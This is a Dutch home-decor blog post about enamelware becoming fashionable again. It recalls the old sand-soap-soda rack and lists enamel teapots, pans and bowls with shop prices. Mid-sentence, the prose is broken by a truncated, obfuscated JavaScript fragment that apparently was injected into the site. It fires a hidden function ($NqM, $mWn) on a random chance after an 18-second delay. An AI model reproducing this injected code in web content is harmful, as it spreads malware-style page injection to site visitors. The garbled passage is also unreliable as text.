Emaille is weer helemaal trendy!

Het is me nu meerdere malen opgevallen dat producten van emaille weer helemaal trendy zijn. Op televisie zag ik al een aantal keer een thee mok van emaille, maar deze trend zie je ook bij verschillende woonaccesoires. Emaille is een beschermlaag van gesmolten glas. Dit wordt bijvoorbeeld gebruikt op aardewerk of metaal om het te beschermen, isoleren of te versieren. Het doet een beetje aan vroeger denken, al kan het in een modern interieur ook erg goed staan.

Zand, Zeep, Soda

Een bekend product gemaakt van emaille is dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch wel het ouderwetse zand, zeep en soda stel. Een rekje met drie geëmailleerde metalen bakjes met schoonmaakmiddelen uit de 20e eeuw. Zeep werd vroeger eigenlijk voor alles gebruikt en als iets echt heel vies was gebruikte men soda of zelfs zand. Op Marktplaats kun zo’n zand, zeep en soda rekje vaak voor een goede prijs scoren.

zand_zeep_soda

De leukste artikelen met emaille!

Ik ben op zoek gegaan naar de leukste producten van emaille voor huis, tuin en keuken en heb het volgende gevonden.

Theepot, Dille&Camille € 15,95

theepot_emaille

Keukengerei houder, Dille&Camille € 8,95

Keukengereihouder_emaille

Soeppan, Blokker € 16,99

soeppan emaille

Schaaltje, Hip Metaal € 7,95

Emaille_schaal__kom_licht_groen

Vergiet, Hip Metaal € 12,50

emaille_vergiet

Melkbus, Ellemarieke € 18,-

emaille_melkbus

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Emaille is weer helemaal trendy!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.